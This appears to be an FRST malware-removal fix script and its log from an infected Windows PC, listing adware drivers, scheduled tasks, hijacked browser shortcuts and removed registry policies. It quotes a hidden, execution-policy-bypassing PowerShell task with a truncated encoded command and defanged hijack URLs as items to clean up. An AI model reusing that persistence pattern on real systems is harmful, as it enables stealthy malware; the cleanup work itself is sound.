R1 979804fd5c15500d838ae68596384f64; C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys [95040 2016-12-16] (97V68D) <==== ATTENTION
R1 cherimoya; C:\WINDOWS\System32\drivers\cherimoya.sys [65440 2016-12-27] (Windows ® Win 7 DDK provider) <==== ATTENTION
C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys
C:\WINDOWS\System32\drivers\cherimoya.sys
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-12-26] ()
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE
2016-12-27 13:36 - 2016-12-27 13:38 - 00000000 ____D C:\Program Files\Jidd
2016-12-27 13:36 - 2016-12-27 13:36 - 00439808 _____ C:\ProgramData\smp2.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-12-27 13:36 - 2016-12-27 13:36 - 00004424 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134
2016-12-27 13:36 - 2016-12-27 13:36 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____H C:\WINDOWS\system32\BITBBD7.tmp
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\Company
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\Tempfolder
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\CrashRpt
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\uninst
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\ProgramData\SearchModule
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\JiddUn
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-12-27 13:21 - 2016-12-27 13:21 - 00000000 ____D C:\ProgramData\d4b1e343-7d03-0
2016-12-27 13:16 - 2016-12-27 13:16 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-12-27 13:16 - 2016-12-27 13:16 - 00002954 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-12-27 13:16 - 2016-12-27 13:16 - 00002660 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-12-27 13:16 - 2016-12-27 13:16 - 00001063 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\d4b1e343-2e47-1
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-12-27 13:12 - 2016-12-27 13:12 - 08784866 _____ C:\xpack1221_US.1482324322.exe
2016-12-27 13:12 - 2016-12-27 13:12 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2016-12-27 13:10 - 2016-12-27 13:11 - 08784866 _____ C:\WINDOWS\SysWOW64\SendRequest Error
2016-12-27 13:09 - 2016-12-27 13:54 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956
2016-12-27 13:08 - 2016-12-27 13:08 - 00001150 _____ C:\Users\Public\Desktop\KNCTR.lnk
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\Chromium
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Itibiti Soft Phone
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-12-27 13:07 - 2016-12-27 13:37 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE
2016-12-27 13:07 - 2016-12-27 13:10 - 00100352 _____ C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 00002560 _____ C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:07 - 2016-12-27 13:07 - 00003074 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2
2016-12-27 13:07 - 2016-12-27 13:07 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____H C:\WINDOWS\system32\BITDFC5.tmp
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ProxyGate
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\1OZOH9DOKF
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\0DA5GV0SMZ
2016-12-27 13:06 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\BestCleaner
2016-12-27 13:06 - 2016-12-27 13:06 - 00002770 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock
2016-12-27 13:06 - 2016-12-27 13:06 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job
2016-12-27 13:06 - 2016-12-27 13:06 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-12-27 13:06 - 2016-12-27 13:06 - 00000000 ____D C:\Program Files (x86)\Youtube AdBlock
2016-12-27 13:05 - 2016-12-27 13:06 - 02194294 _____ (Stellar Information Technology Pvt Ltd. ) C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload
2016-12-27 13:05 - 2016-12-27 13:06 - 00003874 _____ C:\WINDOWS\System32\Tasks\73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003866 _____ C:\WINDOWS\System32\Tasks\k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003860 _____ C:\WINDOWS\System32\Tasks\18170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003856 _____ C:\WINDOWS\System32\Tasks\60353394
2016-12-27 13:05 - 2016-12-27 13:06 - 00003746 _____ C:\WINDOWS\System32\Tasks\ga7369985773699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003742 _____ C:\WINDOWS\System32\Tasks\gak73699857k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003734 _____ C:\WINDOWS\System32\Tasks\ga1817011518170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003728 _____ C:\WINDOWS\System32\Tasks\ga6035339460353394
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Ovals
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\mem
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Disenfranchise
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ASPackage
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files\AE5AV44CD6
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\knockdowns
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
2016-12-27 13:03 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\AGData
2016-12-27 13:03 - 2016-12-27 13:03 - 00003804 _____ C:\WINDOWS\System32\Tasks\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00003414 _____ C:\WINDOWS\System32\Tasks\AGProxyCheck
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Program Files (x86)\AnonymizerGadget
2016-12-27 13:02 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Unfugitivepocson
2016-12-27 13:02 - 2016-12-27 13:02 - 00024776 _____ C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}
2016-12-27 13:02 - 2016-12-27 13:02 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-12-27 13:02 - 2016-12-27 13:02 - 00003372 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-12-27 13:02 - 2016-12-27 13:02 - 00001147 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-72a5-1
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-42f7-0
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-12-27 12:51 - 2016-12-27 12:51 - 00010752 _____ C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-21 06:43 - 2016-12-21 06:43 - 00046592 _____ C:\exervice.exe
2016-12-16 09:24 - 2016-12-16 09:24 - 01718968 _____ C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe
2016-12-16 09:18 - 2016-12-16 09:18 - 00095040 _____ (97V68D) C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000854 _____ () C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000278 _____ () C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat
2016-12-27 12:51 - 2016-12-27 12:51 - 0010752 _____ () C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-27 13:07 - 2016-12-27 13:10 - 0100352 _____ () C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 0002560 _____ () C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 0439808 _____ () C:\ProgramData\smp2.exe
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
Task: {0A6D162B-2271-438A-9015-FDF86E38E3A1} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {0B0C6F63-0BD1-498A-9527-397F7F32D262} - System32\Tasks\gak73699857k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {11643EA6-43A5-4B26-BCA2-B79C17E2627D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {136AC49D-1185-4DAF-9EED-4010A2D37876} - System32\Tasks\src_srv => C:\Users\Robert G\AppData\Roaming\src_srv\tsktst.exe [2016-12-26] ()
C:\Program Files (x86)\knockdowns
Task: {1990B26F-6ADF-4BD8-BA6F-799C43204F26} - System32\Tasks\18170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {1CCBFDDC-4FED-4859-9EA1-176E35894E0A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {1E7810AB-4461-4BAB-A923-725FF0121E8B} - System32\Tasks\73699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} - System32\Tasks\Update Service for Youtube AdBlock => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {335F0AFA-8CF9-409A-931C-B15A49778819} - System32\Tasks\Update Service for Youtube AdBlock2 => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {4E463819-FB04-48C1-ACDA-F4F4D23C5466} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A} - System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ATTENTION
Task: {5D326864-1C1B-4B0C-98E4-8975183EBD11} - \WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001 -> No File <==== ATTENTION
Task: {69CE572E-9923-4159-A330-DB1D3C2631A8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565} - System32\Tasks\60353394 => C:\Program Files (x86)\Ovals\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {7115A4DA-439D-4050-9AEF-FD2E2E5A752E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {7B8662A0-9355-4D8A-8BFD-BEAF35343CD1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {85384654-A986-4FB7-A8DA-D7761EDA3149} - System32\Tasks\k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {965C4FE9-DA8F-4232-8D6F-D709676DEF24} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {99C8DB32-949A-499C-B5D9-6042D048950D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {9FFCB734-D79F-4764-8B63-4F06330E3F45} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {A06CEAA3-C663-4DD1-BE93-23D8A41E521F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A18C8BED-9923-4C65-B78D-B7C168B06955} - System32\Tasks\ga1817011518170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] ()
Task: {A9528279-474A-4DBA-B459-B825FF0C055E} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {AA44AE25-68B3-45C6-B7D1-06333F50237C} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-12-27] () <==== ATTENTION
Task: {AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} - System32\Tasks\AGProxyCheck => C:\Program [Argument = Files (x86)\AnonymizerGadget\AGService.exe /recove]
Task: {ADD99CD3-D8CD-40A8-935C-68C869A6BCB2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75} - System32\Tasks\ga7369985773699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] ()
Task: {B7270AB1-E0AB-41E2-971C-27831D9730D2} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: {C3BB1E32-5428-4562-8D07-A171B852CB9C} - System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAA7ADsAIAA7ACAAOwAgADsAIAAgACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (the data entry has 10148 more characters). <==== ATTENTION
Task: {FD468177-984E-4514-B2CE-7B86E83EF36F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,"
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files (x86)\Google\Chrome\application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP
AlternateDataStreams: C:\ProgramData\Temp:972E3A44 [272]
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe: exefile => "%1" %* <===== ATTENTION
FirewallRules: [{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE}] => C:\Program Files (x86)\Ovals\fluctuations.exe
FirewallRules: [{CE917A65-979C-4094-9A27-546C03A0F0B4}] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe
FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}]
FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}]
hosts:
emptytemp:
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\Robert G\AppData\Local\Temp\WS => moved successfully
C:\Users\Robert G\AppData\Roaming\src_srv => moved successfully
C:\Program Files\AE5AV44CD6 => moved successfully
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE => moved successfully
C:\Program Files (x86)\mem => moved successfully
C:\Program Files (x86)\BestCleaner => moved successfully
C:\Program Files\1OZOH9DOKF => moved successfully
C:\Program Files\0DA5GV0SMZ => moved successfully
"C:\Program Files (x86)\Unfugitivepocson" => not found.
C:\Program Files (x86)\Ovals => moved successfully
"C:\Program Files (x86)\NowUSeeItPlayer" => not found.
"C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe" => not found.
C:\Program Files\Common Files\Noobzo => moved successfully
"C:\Program Files\Jidd" => not found.
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz => moved successfully
C:\Users\Robert G\AppData\Roaming\Xeeedxi => moved successfully
C:\Users\Robert G\AppData\Roaming\Interstatnogui => moved successfully
"C:\Windows\Temp\nst9E9E.tmp" => not found.
C:\Windows\Temp\set_xVQSGNGL.exe => moved successfully
"C:\Windows\Temp\set_xVQSGNGL.exe" => not found.
"C:\Users\Robert G\AppData\Local\Temp\WS" => not found.
"C:\Program Files (x86)\Unfugitivepocson" => not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\group => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\groupgroup => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AnonymizerGadget => value not found.
C:\Users\Robert G\AppData\Roaming\AGData => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\src_srv => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ayling => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\aylingayling => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BestCleaner => value not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\NowUSeeIt Player => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_FD7I7 => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_4SCPB => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewOnDrive => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRun => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRunOnce => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRun => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRunOnce => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewContextMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoShellSearchButton => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFile => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideClock => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayContextMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayItemsDisplay => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetFolders => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDevMgrUpdate => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetTaskbar => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDeletePrinter => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDFSTab => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoChangeStartMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogoff => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoWindowsUpdate => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoEncryptOnMove => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRunasInstallPrompt => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
